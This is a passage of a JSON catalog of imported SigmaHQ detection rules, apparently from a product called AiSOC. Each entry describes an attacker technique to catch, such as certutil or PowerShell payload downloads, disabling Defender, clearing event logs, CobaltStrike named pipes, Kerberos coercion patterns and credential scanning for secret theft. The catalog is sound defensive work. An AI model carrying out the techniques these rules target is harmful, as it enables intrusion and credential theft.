via the \"PromptOnSecureDesktop\" value.\nThe \"PromptOnSecureDesktop\" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.\nWhen \"PromptOnSecureDesktop\" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-secure-desktop-prompt-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d7ceeef-3539-4392-8953-3dc664912714", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_disable_secure_desktop_prompt.yml" } }, { "id": "sigmahq-sigma-0d933542-1f1f-420d-97d4-21b2c3c492d9", "type": "detection", "name": "Kubernetes Unauthorized or Unauthenticated Access", "description": "Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used.\nThis may indicate an attacker attempting to leverage credentials they have obtained.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-unauthorized-or-unauthenticated-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d933542-1f1f-420d-97d4-21b2c3c492d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_unauthorized_unauthenticated_actions.yml" } }, { "id": "sigmahq-sigma-0dba975d-a193-4ed1-a067-424df57570d1", "type": "detection", "name": "Uncommon Network Connection Initiated By Certutil.EXE", "description": "Detects a network connection initiated by the certutil.exe utility.\nAttackers can abuse the utility in order to download malware or additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-network-connection-initiated-by-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0dba975d-a193-4ed1-a067-424df57570d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_certutil_initiated_connection.yml" } }, { "id": "sigmahq-sigma-0ddcff6d-d262-40b0-804b-80eb592de8e3", "type": "detection", "name": "Azure Service Principal Created", "description": "Identifies when a service principal is created in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-service-principal-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ddcff6d-d262-40b0-804b-80eb592de8e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_service_principal_created.yml" } }, { "id": "sigmahq-sigma-0e0255bf-2548-47b8-9582-c0955c9283f5", "type": "detection", "name": "Suspicious Reg Add BitLocker", "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-reg-add-bitlocker.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e0255bf-2548-47b8-9582-c0955c9283f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_bitlocker.yml" } }, { "id": "sigmahq-sigma-0e0bc253-07ed-43f1-816d-e1b220fe8971", "type": "detection", "name": "Potential RjvPlatform.DLL Sideloading From Non-Default Location", "description": "Detects potential DLL sideloading of \"RjvPlatform.dll\" by \"SystemResetPlatform.exe\" located in a non-default location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rjvplatform-dll-sideloading-from-non-default-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e0bc253-07ed-43f1-816d-e1b220fe8971", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_rjvplatform_non_default_location.yml" } }, { "id": "sigmahq-sigma-0e20c89d-2264-44ae-8238-aeeaba609ece", "type": "detection", "name": "Potential Persistence Via Microsoft Office Startup Folder", "description": "Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-microsoft-office-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_startup_persistence.yml" } }, { "id": "sigmahq-sigma-0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "type": "detection", "name": "Office Macro File Download", "description": "Detects the creation of a new office macro files on the system via an application (browser, mail client).\nThis can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-macro-file-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml" } }, { "id": "sigmahq-sigma-0e4164da-94bc-450d-a7be-a4b176179f1f", "type": "detection", "name": "Firewall Configuration Discovery Via Netsh.EXE", "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/firewall-configuration-discovery-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e4164da-94bc-450d-a7be-a4b176179f1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml" } }, { "id": "sigmahq-sigma-0e6a9e62-627e-496c-aef5-bfa39da29b5e", "type": "detection", "name": "MaxMpxCt Registry Value Changed", "description": "Detects changes to the \"MaxMpxCt\" registry value.\nMaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.\nRansomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/maxmpxct-registry-value-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e6a9e62-627e-496c-aef5-bfa39da29b5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_optimize_file_sharing_network.yml" } }, { "id": "sigmahq-sigma-0e7163d4-9e19-4fa7-9be6-000c61aad77a", "type": "detection", "name": "CobaltStrike Named Pipe Pattern Regex", "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-named-pipe-pattern-regex.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml" } }, { "id": "sigmahq-sigma-0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "type": "detection", "name": "File Download with Headless Browser", "description": "Detects execution of chromium based browser in headless mode using the \"dump-dom\" command line to download files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-with-headless-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml" } }, { "id": "sigmahq-sigma-0ea52357-cd59-4340-9981-c46c7e900428", "type": "detection", "name": "Potentially Suspicious Rundll32.EXE Execution of UDL File", "description": "Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.\nThreat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011", "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-rundll32-exe-execution-of-udl-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ea52357-cd59-4340-9981-c46c7e900428", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_udl_exec.yml" } }, { "id": "sigmahq-sigma-0ea8db81-2ff6-4525-9448-33bbe7effc13", "type": "detection", "name": "New DMSA Service Account Created in Specific OUs", "description": "Detects the creation of a dMSASvc account using the New-ADServiceAccount cmdlet in certain OUs.\nThe fact that the Cmdlet is used to create a dMSASvc account in a specific OU is highly suspicious.\nIt is a pattern trying to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025.\nOn top of that, if the user that is creating the dMSASvc account is not a legitimate administrator or does not have the necessary permissions,\nit is a strong signal of an attempted or successful abuse of the BaDSuccessor vulnerability for privilege escalation within the Windows Server 2025 Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dmsa-service-account-created-in-specific-ous.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ea8db81-2ff6-4525-9448-33bbe7effc13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_create_new_dmsasvc_account.yml" } }, { "id": "sigmahq-sigma-0eb46774-f1ab-4a74-8238-1155855f2263", "type": "detection", "name": "Disable Windows Defender Functionalities Via Registry Keys", "description": "Detects when attackers or tools disable Windows Defender functionalities via the Windows registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-defender-functionalities-via-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0eb46774-f1ab-4a74-8238-1155855f2263", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" } }, { "id": "sigmahq-sigma-0ed75b9c-c73b-424d-9e7d-496cd565fbe0", "type": "detection", "name": "Security Software Discovery - MacOs", "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-software-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" } }, { "id": "sigmahq-sigma-0ed99dda-6a35-11ef-8c99-0242ac120002", "type": "detection", "name": "Attempts of Kerberos Coercion Via DNS SPN Spoofing", "description": "Detects the presence of \"UWhRC....AAYBAAAA\" pattern in command line.\nThe pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\nAttackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\nIt is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\nto spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.\nIf you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,\nor checking for the presence of such records through the `nslookup` command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/attempts-of-kerberos-coercion-via-dns-spn-spoofing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ed99dda-6a35-11ef-8c99-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_kerberos_coercion_via_dns_spn_spoofing.yml" } }, { "id": "sigmahq-sigma-0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "type": "detection", "name": "HybridConnectionManager Service Installation", "description": "Rule to detect the Hybrid Connection Manager service installation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hybridconnectionmanager-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" } }, { "id": "sigmahq-sigma-0ef56343-059e-4cb6-adc1-4c3c967c5e46", "type": "detection", "name": "Suspicious Execution of Systeminfo", "description": "Detects usage of the \"systeminfo\" command to retrieve information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-systeminfo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml" } }, { "id": "sigmahq-sigma-0f017df3-8f5a-414f-ad6b-24aff1128278", "type": "detection", "name": "Suspicious Eventlog Clear", "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the Windows event logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-eventlog-clear.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f017df3-8f5a-414f-ad6b-24aff1128278", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" } }, { "id": "sigmahq-sigma-0f0450f3-8b47-441e-a31b-15a91dc243e2", "type": "detection", "name": "Potential DLL File Download Via PowerShell Invoke-WebRequest", "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-file-download-via-powershell-invoke-webrequest.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml" } }, { "id": "sigmahq-sigma-0f06a3a5-6a09-413f-8743-e6cf35561297", "type": "detection", "name": "WMI Event Subscription", "description": "Detects creation of WMI event subscription persistence method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-event-subscription.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" } }, { "id": "sigmahq-sigma-0f16d9cf-0616-45c8-8fad-becc11b5a41c", "type": "detection", "name": "Renamed AutoHotkey.EXE Execution", "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-autohotkey-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml" } }, { "id": "sigmahq-sigma-0f2468a2-5055-4212-a368-7321198ee706", "type": "detection", "name": "Activity from Infrequent Country", "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-from-infrequent-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f2468a2-5055-4212-a368-7321198ee706", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml" } }, { "id": "sigmahq-sigma-0f60b28c-64dd-4e2c-9a63-5334d3e3a6e6", "type": "detection", "name": "Script Interpreter Spawning Credential Scanner - Windows", "description": "Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks).\nThis behavior is indicative of an attempt to find and steal secrets, as seen in the \"Shai-Hulud: The Second Coming\" campaign.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/script-interpreter-spawning-credential-scanner-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f60b28c-64dd-4e2c-9a63-5334d3e3a6e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_script_interpretor_spawn_credential_scanner.yml" } }, { "id": "sigmahq-sigma-0f63e1ef-1eb9-4226-9d54-8927ca08520a", "type": "detection", "name": "Admin User Remote Logon", "description": "Detect remote login by Administrator user (depending on internal pattern).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.001", "T1078.002", "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/admin-user-remote-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml" } }, { "id": "sigmahq-sigma-0f6da907-5854-4be6-859a-e9958747b0aa", "type": "detection", "name": "Potential DLL Injection Via AccCheckConsole", "description": "Detects the execution \"AccCheckConsole\" a command-line tool for verifying the accessibility implementation of an application's UI.\nOne of the tests that this checker can run are called \"verification routine\", which tests for things like Consistency, Navigation, etc.\nThe tool allows a user to provide a DLL that can contain a custom \"verification routine\". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the \"AccCheckConsole\" utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-injection-via-acccheckconsole.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f6da907-5854-4be6-859a-e9958747b0aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_acccheckconsole_execution.yml" } }, { "id": "sigmahq-sigma-0f79c4d2-4e1f-4683-9c36-b5469a665e06", "type": "detection", "name": "Access of Sudoers File Content", "description": "Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-of-sudoers-file-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_process_reading_sudoers.yml" } }, { "id": "sigmahq-sigma-0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "type": "detection", "name": "Potential Privilege Escalation via Service Permissions Weakness", "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-via-service-permissions-weakness.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml" } }, { "id": "sigmahq-sigma-0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "type": "detection", "name": "Potential DLL Sideloading Using Coregen.exe", "description": "Detect usage of the \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload 